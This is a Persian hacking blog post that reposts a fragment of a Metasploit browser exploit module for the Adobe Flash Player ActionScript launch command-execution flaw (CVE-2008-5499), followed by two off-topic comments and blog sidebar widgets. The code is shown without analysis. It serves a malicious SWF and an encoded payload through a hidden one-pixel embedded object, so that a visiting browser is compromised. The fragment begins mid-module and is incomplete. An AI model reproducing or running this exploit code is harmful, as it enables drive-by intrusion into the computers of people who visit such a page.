تبلیغات
:.گام به گام تاهک با ترور هکر:. - Adobe Flash Player ActionScript Launch Command Execution
 
یکشنبه 17 اردیبهشت 1391 :: نویسنده : محمّد
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
fd = File.open( path, "rb" )
@swf = fd.read(fd.stat.size)
fd.close

super
end

def on_request_uri(cli, request)
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
trigger = @swf
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

obj_id = rand_text_alpha(rand(6)+3)

if request.uri.match(/\.swf/i)
print_status("#{msg} Sending Exploit SWF")
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end

if request.uri.match(/\.txt/i)
send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
return
end

html = <<-EOS
<html>
<head>
</head>
<body>
<center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{get_resource}#{trigger_file}" />
<embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/go/getflashplayer">
</embed>

</object>
</center>

</body>
</html>
EOS

print_status("#{msg} Sending HTML...")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end




نوع مطلب : اکسپلویت، 
برچسب ها :
لینک های مرتبط :


شنبه 14 مرداد 1396 12:20 ق.ظ
Hello there! I know this is somewhat off topic but I was wondering if you knew
where I could locate a captcha plugin for
my comment form? I'm using the same blog platform as yours and I'm having difficulty
finding one? Thanks a lot!
جمعه 13 مرداد 1396 08:55 ب.ظ
Hey! I know this is kinda off topic but I was wondering which blog platform are you using for this website?
I'm getting sick and tired of Wordpress because I've had
issues with hackers and I'm looking at alternatives for another platform.

I would be fantastic if you could point me in the direction of
a good platform.
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر


:.گام به گام تاهک با ترور هکر:.
درباره وبلاگ


مدیر وبلاگ : محمّد
نویسندگان
نظرسنجی
نظرتون در باره وبلگ من چیه؟







آمار وبلاگ
کل بازدید :
بازدید امروز :
بازدید دیروز :
بازدید این ماه :
بازدید ماه قبل :
تعداد نویسندگان :
تعداد کل پست ها :
آخرین بازدید :
آخرین بروز رسانی :